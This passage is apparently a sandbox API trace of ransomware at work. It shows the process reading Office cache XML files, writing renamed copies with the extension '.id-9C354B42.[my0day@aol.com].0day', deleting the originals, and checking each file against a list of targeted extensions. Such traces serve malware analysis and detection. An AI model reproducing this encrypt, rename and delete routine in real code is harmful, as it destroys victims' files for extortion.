Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.160] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.160] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.160] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.160] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.161] GetLastError () returned 0x0 [0034.161] ReadFile (in: hFile=0x188, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x5b1, lpOverlapped=0x0) returned 1 [0034.162] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0034.164] ReadFile (in: hFile=0x188, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.164] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.164] SetEndOfFile (hFile=0x198) returned 1 [0034.164] CloseHandle (hObject=0x198) returned 1 [0034.164] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.164] SetEndOfFile (hFile=0x188) returned 1 [0034.165] CloseHandle (hObject=0x188) returned 1 [0034.165] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.166] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 1 [0034.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.166] lstrlenW (lpString=".doc") returned 4 [0034.166] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.166] lstrlenW (lpString=".docx") returned 5 [0034.166] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.166] lstrlenW (lpString=".pdf") returned 4 [0034.166] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.166] lstrlenW (lpString=".xls") returned 4 [0034.166] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.166] lstrlenW (lpString=".xlsx") returned 5 [0034.166] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.166] lstrlenW (lpString=".ppt") returned 4 [0034.166] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.166] lstrlenW (lpString=".zip") returned 4 [0034.166] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.166] lstrlenW (lpString=".rar") returned 4 [0034.166] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.166] lstrlenW (lpString=".bz2") returned 4 [0034.166] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.166] lstrlenW (lpString=".7z") returned 3 [0034.166] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.166] lstrlenW (lpString=".dbf") returned 4 [0034.166] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.166] lstrlenW (lpString=".1cd") returned 4 [0034.166] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.167] lstrlenW (lpString=".jpg") returned 4 [0034.167] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.167] lstrlenW (lpString=".doc") returned 4 [0034.167] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.167] lstrlenW (lpString=".docx") returned 5 [0034.167] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.167] lstrlenW (lpString=".pdf") returned 4 [0034.167] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.167] lstrlenW (lpString=".xls") returned 4 [0034.167] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.167] lstrlenW (lpString=".xlsx") returned 5 [0034.167] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.167] lstrlenW (lpString=".ppt") returned 4 [0034.167] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.167] lstrlenW (lpString=".zip") returned 4 [0034.167] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.167] lstrlenW (lpString=".rar") returned 4 [0034.167] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.167] lstrlenW (lpString=".bz2") returned 4 [0034.167] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.167] lstrlenW (lpString=".7z") returned 3 [0034.167] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.167] lstrlenW (lpString=".dbf") returned 4 [0034.167] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.167] lstrlenW (lpString=".1cd") returned 4 [0034.167] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.168] lstrlenW (lpString=".jpg") returned 4 [0034.168] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.168] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.168] lstrlenW (lpString="Proof.xml") returned 9 [0034.168] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.168] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1458) returned 1 [0034.168] CloseHandle (hObject=0x188) returned 1 [0034.168] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 0x2020 [0034.168] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.168] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.168] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.168] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.168] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.169] GetLastError () returned 0x0 [0034.169] ReadFile (in: hFile=0x188, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x5b2, lpOverlapped=0x0) returned 1 [0034.170] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0034.171] ReadFile (in: hFile=0x188, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.171] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.171] SetEndOfFile (hFile=0x198) returned 1 [0034.173] CloseHandle (hObject=0x198) returned 1 [0034.174] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.174] SetEndOfFile (hFile=0x188) returned 1 [0034.175] CloseHandle (hObject=0x188) returned 1 [0034.175] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.175] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 1 [0034.175] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.175] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.175] lstrlenW (lpString=".doc") returned 4 [0034.175] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.175] lstrlenW (lpString=".docx") returned 5 [0034.175] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.175] lstrlenW (lpString=".pdf") returned 4 [0034.175] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.175] lstrlenW (lpString=".xls") returned 4 [0034.176] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.176] lstrlenW (lpString=".xlsx") returned 5 [0034.176] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.176] lstrlenW (lpString=".ppt") returned 4 [0034.176] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.176] lstrlenW (lpString=".zip") returned 4 [0034.176] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.176] lstrlenW (lpString=".rar") returned 4 [0034.176] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.176] lstrlenW (lpString=".bz2") returned 4 [0034.176] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.176] lstrlenW (lpString=".7z") returned 3 [0034.176] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.176] lstrlenW (lpString=".dbf") returned 4 [0034.176] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.176] lstrlenW (lpString=".1cd") returned 4 [0034.176] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.176] lstrlenW (lpString=".jpg") returned 4 [0034.176] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.176] lstrlenW (lpString=".doc") returned 4 [0034.176] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.176] lstrlenW (lpString=".docx") returned 5 [0034.176] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.176] lstrlenW (lpString=".pdf") returned 4 [0034.176] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.176] lstrlenW (lpString=".xls") returned 4 [0034.176] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.177] lstrlenW (lpString=".xlsx") returned 5 [0034.177] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.177] lstrlenW (lpString=".ppt") returned 4 [0034.177] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.177] lstrlenW (lpString=".zip") returned 4 [0034.177] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.177] lstrlenW (lpString=".rar") returned 4 [0034.177] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.177] lstrlenW (lpString=".bz2") returned 4 [0034.177] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.177] lstrlenW (lpString=".7z") returned 3 [0034.177] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.177] lstrlenW (lpString=".dbf") returned 4 [0034.177] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.177] lstrlenW (lpString=".1cd") returned 4 [0034.177] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.177] lstrlenW (lpString=".jpg") returned 4 [0034.177] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.177] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.177] lstrlenW (lpString="Proofing.xml") returned 12 [0034.177] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.178] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=811) returned 1 [0034.178] CloseHandle (hObject=0x188) returned 1 [0034.178] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 0x2020 [0034.308] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.308] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.308] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.308] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.308] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0034.309] GetLastError () returned 0x0 [0034.309] ReadFile (in: hFile=0x184, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x32b, lpOverlapped=0x0) returned 1 [0034.312] WriteFile (in: hFile=0x190, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x330, lpOverlapped=0x0) returned 1 [0034.313] ReadFile (in: hFile=0x184, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.313] WriteFile (in: hFile=0x190, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.313] SetEndOfFile (hFile=0x190) returned 1 [0034.313] CloseHandle (hObject=0x190) returned 1 [0034.314] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.314] SetEndOfFile (hFile=0x184) returned 1 [0034.314] CloseHandle (hObject=0x184) returned 1 [0034.314] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.315] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 1 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.315] lstrlenW (lpString=".doc") returned 4 [0034.315] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString=".docx") returned 5 [0034.315] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0034.315] lstrlenW (lpString=".pdf") returned 4 [0034.315] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString=".xls") returned 4 [0034.315] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString=".xlsx") returned 5 [0034.315] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0034.315] lstrlenW (lpString=".ppt") returned 4 [0034.315] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.315] lstrlenW (lpString=".zip") returned 4 [0034.315] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.315] lstrlenW (lpString=".rar") returned 4 [0034.315] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString=".bz2") returned 4 [0034.315] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString=".7z") returned 3 [0034.315] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.315] lstrlenW (lpString=".dbf") returned 4 [0034.315] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.315] lstrlenW (lpString=".1cd") returned 4 [0034.316] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.316] lstrlenW (lpString=".jpg") returned 4 [0034.316] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.316] lstrlenW (lpString=".doc") returned 4 [0034.316] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString=".docx") returned 5 [0034.316] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0034.316] lstrlenW (lpString=".pdf") returned 4 [0034.316] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString=".xls") returned 4 [0034.316] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString=".xlsx") returned 5 [0034.316] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0034.316] lstrlenW (lpString=".ppt") returned 4 [0034.316] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.316] lstrlenW (lpString=".zip") returned 4 [0034.316] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.316] lstrlenW (lpString=".rar") returned 4 [0034.316] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString=".bz2") returned 4 [0034.316] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString=".7z") returned 3 [0034.316] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.316] lstrlenW (lpString=".dbf") returned 4 [0034.316] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.316] lstrlenW (lpString=".1cd") returned 4 [0034.316] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.317] lstrlenW (lpString=".jpg") returned 4 [0034.317] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.317] Sleep (dwMilliseconds=0x64) [0034.549] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.549] lstrlenW (lpString="Setup.xml") returned 9 [0034.549] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 